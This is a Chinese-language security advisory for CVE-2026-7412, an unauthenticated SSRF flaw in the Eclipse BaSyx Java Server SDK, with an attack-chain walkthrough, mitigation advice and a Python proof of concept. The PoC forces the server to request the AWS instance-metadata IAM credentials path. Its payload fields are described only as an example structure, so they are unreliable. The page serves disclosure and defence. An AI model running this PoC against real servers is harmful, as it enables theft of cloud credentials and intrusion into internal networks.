CVE-2026-7412 CVSS 8.6 高危

CVE-2026-7412 Eclipse BaSyx SSRF漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7412

漏洞类型

SSRF (服务端请求伪造)

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse BaSyx Java Server SDK

漏洞概述

Eclipse BaSyx Java Server SDK 2.0.0-milestone-10之前的版本存在安全漏洞。操作委托功能未验证目标URI，允许未认证攻击者强制服务器向任意目标发送盲HTTP POST请求，从而绕过网络分段访问内网或云元数据服务。

技术细节

此漏洞源于Eclipse BaSyx Java Server SDK的操作委托组件在设计上缺乏对目标URI的安全校验。攻击者无需任何身份认证，即可向受影响的服务端发送特制请求，并在请求参数中指定任意的内部或外部地址。由于服务器信任该URI并代为发起HTTP POST请求，攻击者可利用此行为进行SSRF攻击。这不仅允许探测内网资产，还能通过访问Cloud Metadata Services（如AWS IMDS）获取临时凭证，从而进一步渗透内网OT/IT基础设施。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的Eclipse BaSyx Java Server服务器实例。

STEP 2

构造恶意请求

攻击者构造一个特制的HTTP请求，利用操作委托功能，将目标URI设置为内网敏感地址（如云元数据服务）或IT/OT基础设施地址。

STEP 3

发送请求

攻击者无需认证，将恶意请求发送给BaSyx服务器。

STEP 4

服务器代发请求

BaSyx服务器解析请求，由于未验证URI，服务器向攻击者指定的目标地址发起盲HTTP POST请求。

STEP 5

达成利用

攻击者通过时间延迟、DNS外带或云元数据响应（如获取IAM凭证）确认漏洞存在，并进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-7412 PoC Generator
# Target: Eclipse BaSyx Java Server SDK < 2.0.0-milestone-10
# Description: Exploits the Operation Delegation feature to force a blind HTTP POST to an arbitrary URI.

def exploit_ssrf(target_url, malicious_uri):
    """
    Sends a malicious request to the vulnerable BaSyx server
    to force a POST request to the malicious_uri.
    """
    # Example payload structure based on Operation Delegation
    payload = {
        "operation": "delegate",
        "destination": malicious_uri,
        "method": "POST"
    }
    
    try:
        print(f"[*] Sending SSRF payload to {target_url}")
        print(f"[*] Forcing server to POST to: {malicious_uri}")
        
        response = requests.post(target_url, json=payload, timeout=5)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if the internal server received the request.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Example: Attacker tries to hit the AWS IMDSv1 (if not protected) or an internal admin panel
    target = "http://vulnerable-basyx-server:8080/api/operation"
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)

影响范围

Eclipse BaSyx Java Server SDK < 2.0.0-milestone-10

防御指南

临时缓解措施

如果无法立即升级，应在防火墙或安全组中严格限制Eclipse BaSyx服务器的出站连接权限，特别是禁止其访问云元数据服务IP（如169.254.169.254）及其他敏感的内网管理接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表